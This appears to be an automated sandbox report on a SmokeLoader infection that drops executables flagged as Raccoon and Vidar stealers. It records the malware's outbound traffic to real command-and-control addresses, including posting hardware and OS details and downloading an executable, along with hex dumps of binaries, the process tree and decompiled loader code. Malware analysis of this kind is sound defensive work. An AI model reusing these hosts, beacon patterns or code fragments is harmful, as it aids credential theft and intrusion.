00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NEEE"GL^NElUVA_D2DDRichEPEL8'Y"! @@A H?08@.text `.dataD@.idata@@.rsrc @@.reloc0@B
Aug 24, 2021 08:47:20.300879955 CEST	16904	OUT	POST / HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 4955 Host: 188.34.200.103 Connection: Keep-Alive Cache-Control: no-cache
Aug 24, 2021 08:47:20.301193953 CEST	16909	OUT	Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 64 30 36 65 64 36 33 35 2d 36 38 66 Data Ascii: --1BEF0A57BE110FD467AContent-Disposition: form-data; name="hwid"d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963--1BEF0A57BE110FD467AContent-Disposition: form-data; name="os"Windows 10 Pro--1BEF0A57BE110FD467AContent-Disposition: fo
Aug 24, 2021 08:47:20.452172995 CEST	16910	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:47:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip Data Raw: 31 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cb cf 06 00 47 dd dc 79 02 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 16Gy0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.7	49720	185.49.70.90	2080	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 24, 2021 08:47:01.573873043 CEST	16511	OUT	GET /5.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 185.49.70.90:2080
Aug 24, 2021 08:47:01.598486900 CEST	16568	IN	HTTP/1.1 200 OK Date: Tue, 24 Aug 2021 06:47:01 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Transfer-Encoding: Binary Content-disposition: attachment; filename="mzfywvnz.exe" Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: application/octet-stream Data Raw: 32 39 36 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 13 4f ab 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 50 01 00 00 7a 8a 02 00 00 00 00 1e 24 00 00 00 10 00 00 00 60 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 8b 02 00 04 00 00 00 e5 02 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 30 a0 01 00 51 00 00 00 f0 95 01 00 3c 00 00 00 00 b0 8a 02 98 c5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 61 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 7d 01 00 18 00 00 00 d8 7c 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 4f 01 00 00 10 00 00 00 50 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 81 40 00 00 00 60 01 00 00 42 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 f2 88 02 00 b0 01 00 00 3a 00 00 00 96 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 c5 00 00 00 b0 8a 02 00 c6 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 29600MZ@!L!This program cannot be run in DOS mode.$PELO^Pz$`@0Q<a }\|@`.text1OP `.rdata@`BT@@.data8:@.rsrc@@

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.7	49722	212.224.105.79	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 24, 2021 08:47:16.293051958 CEST	16902	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 423 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:47:16.293076992 CEST	16903	OUT	Data Raw: 6c 9b 06 9e 13 ec 9a 09 ce 7a 79 63 e7 e7 5a 19 62 bf a3 46 7d c4 1a de 65 ce 48 18 52 d2 da 52 21 7f 23 0c 24 b7 6e 82 07 3c 89 ca 6e e4 d4 f9 21 7f 77 58 ff 6b 8a 51 fb b3 a7 61 34 21 6a 3a a3 48 50 b5 80 1c 21 bc d5 4a 99 47 ba bf da fd e5 5c Data Ascii: lzycZbF}eHRR!#$n<n!wXkQa4!j:HP!JG\d@> F yK%0,X{j1RcGs85ZcbbEX''WR q]0`;1+fd[PN[pcTU?aTW:
Aug 24, 2021 08:47:16.339485884 CEST	16904	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:47:16 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Aug 24, 2021 08:46:56.919668913 CEST	74.114.154.22	443	192.168.2.7	49717	CN=*.tumblr.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Mar 26 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019	Tue Jun 28 02:00:00 CEST 2022 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB	CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	Fri Nov 02 01:00:00 CET 2018	Wed Jan 01 00:59:59 CET 2031
					CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Mar 12 01:00:00 CET 2019	Mon Jan 01 00:59:59 CET 2029

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 69CDTt1pad.exe PID: 5304 Parent PID: 5540

General

Start time:	08:45:33
Start date:	24/08/2021
Path:	C:\Users\user\Desktop\69CDTt1pad.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\69CDTt1pad.exe'
Imagebase:	0x400000
File size:	153088 bytes
MD5 hash:	0102055C5FBD724BF28BC696CA22F06D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 69CDTt1pad.exe PID: 3804 Parent PID: 5304

General

Start time:	08:45:35
Start date:	24/08/2021
Path:	C:\Users\user\Desktop\69CDTt1pad.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\69CDTt1pad.exe'
Imagebase:	0x400000
File size:	153088 bytes
MD5 hash:	0102055C5FBD724BF28BC696CA22F06D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.319923484.0000000002061000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.319622428.0000000000460000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3292 Parent PID: 3804

General

Start time:	08:45:42
Start date:	24/08/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff662bf0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5640 Parent PID: 560

General

Start time:	08:45:43
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 3132 Parent PID: 560

General

Start time:	08:45:43
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 3608 Parent PID: 560

General

Start time:	08:45:53
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5256 Parent PID: 560

General

Start time:	08:45:55
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5268 Parent PID: 560

General

Start time:	08:45:55
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 3800 Parent PID: 560

General

Start time:	08:45:57
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 724 Parent PID: 560

General

Start time:	08:45:57
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 1288 Parent PID: 560

General

Start time:	08:45:58
Start date:	24/08/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff641cd0000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 1064 Parent PID: 560

General

Start time:	08:45:59
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6160 Parent PID: 560

General

Start time:	08:46:00
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6340 Parent PID: 560

General

Start time:	08:46:14
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6580 Parent PID: 560

General

Start time:	08:46:23
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: tvvihsf PID: 6844 Parent PID: 1104

General

Start time:	08:46:32
Start date:	24/08/2021
Path:	C:\Users\user\AppData\Roaming\tvvihsf
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\tvvihsf
Imagebase:	0x400000
File size:	153088 bytes
MD5 hash:	0102055C5FBD724BF28BC696CA22F06D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Chronological Activities

Analysis Process: tvvihsf PID: 6892 Parent PID: 6844

General

Start time:	08:46:34
Start date:	24/08/2021
Path:	C:\Users\user\AppData\Roaming\tvvihsf
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\tvvihsf
Imagebase:	0x400000
File size:	153088 bytes
MD5 hash:	0102055C5FBD724BF28BC696CA22F06D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000016.00000002.382323711.00000000005A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000016.00000002.382285678.0000000000580000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: AC25.exe PID: 6288 Parent PID: 3292

General

Start time:	08:46:43
Start date:	24/08/2021
Path:	C:\Users\user\AppData\Local\Temp\AC25.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\AC25.exe
Imagebase:	0x400000
File size:	24576 bytes
MD5 hash:	A69E12607D01237460808FA1709E5E86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic

Chronological Activities

Analysis Process: B483.exe PID: 492 Parent PID: 3292

General

Start time:	08:46:46
Start date:	24/08/2021
Path:	C:\Users\user\AppData\Local\Temp\B483.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\B483.exe
Imagebase:	0x400000
File size:	439296 bytes
MD5 hash:	C633B1E68DCFFDAE991C3F2D2D4FFFA5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000001B.00000000.414147261.00000000047E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000001B.00000002.520963245.00000000047E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000001B.00000000.411422894.00000000047E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000001B.00000000.412569574.000000000046C000.00000040.00020000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Chronological Activities

Analysis Process: C481.exe PID: 3804 Parent PID: 3292

General

Start time:	08:46:50
Start date:	24/08/2021
Path:	C:\Users\user\AppData\Local\Temp\C481.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user~1\AppData\Local\Temp\C481.exe
Imagebase:	0xc50000
File size:	542208 bytes
MD5 hash:	68D5331A8418C4089BB7C0F524C77728
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: svchost.exe PID: 5584 Parent PID: 560

General

Start time:	08:46:50
Start date:	24/08/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 5872 Parent PID: 5584

General

Start time:	08:46:51
Start date:	24/08/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 492 -ip 492
Imagebase:	0xaa0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: CA2F.exe PID: 5820 Parent PID: 3292

General

Start time:	08:46:51
Start date:	24/08/2021
Path:	C:\Users\user\AppData\Local\Temp\CA2F.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\CA2F.exe
Imagebase:	0x400000
File size:	624640 bytes
MD5 hash:	BF40705CBA9708182B61956985895005
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001F.00000002.488756126.00000000026D4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 69CDTt1pad.exe PID: 5304 Parent PID: 5540 69CDTt1pad.exeCOMMON

Executed Functions

Function 02F98CF6, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Module32First.KERNEL32(00000000,00000224), ref: 02F98D3E

Memory Dump Source

Source File: 00000001.00000002.243938805.0000000002F98000.00000040.00000001.sdmp, Offset: 02F98000, based on PE: false

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: f9f27e8f869c7274191548ebd7f65d1aef0cb3742f3cd4f0fe1af28b61bf13cd
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: C7F096315007156FFB343BF9AC8CB6EB6E8AF5A6E9F10052AE743D50C0DB70E8454A61

Uniqueness

Uniqueness Score: -1.00%

Function 02F989B5, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02F98A06

Memory Dump Source

Source File: 00000001.00000002.243938805.0000000002F98000.00000040.00000001.sdmp, Offset: 02F98000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 32472b9336d790126242d2d35c7cff0e7f6e004e21e7268c85000634bb383b90
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: EB112B79A00208EFDB01DF98C985E99BBF5AF08390F058094FA489B361D371EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02F985D3, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.243938805.0000000002F98000.00000040.00000001.sdmp, Offset: 02F98000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: dbc68db29db62e829b1139a1922f139f7e7518e4dc3856bcd1ed379736835b2e
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: A4115E73740100AFEB54DF55DC81EA673EAEB9A3A4B1980A5EE04CB316D676EC41CB60

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 69CDTt1pad.exe PID: 3804 Parent PID: 5304 69CDTt1pad.exeCOMMON

Executed Functions

Function 0040197F, Relevance: 3.1, APIs: 2, Instructions: 54
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E0040197F(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t8;
				void* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;

				_t26 = __eflags;
				asm("out dx, eax");
				_push(0x19bb);
				_t8 =  *_t22;
				_t23 = _t22 + 4;
				asm("repne sub eax, 0xfff904e8");
				_push(0x62);
				_t24 = _t23 + 4;
				E004012BF(_t8, _t19, _t20, _t21, __eflags);
				_t16 = _a4;
				Sleep(0x1388);
				_push( &_v8);
				_push(_a12);
				_push(_a8);
				_push(_t16); // executed
				_t11 = E00401502(_t16, _t19, _t20, _t21, _t26); // executed
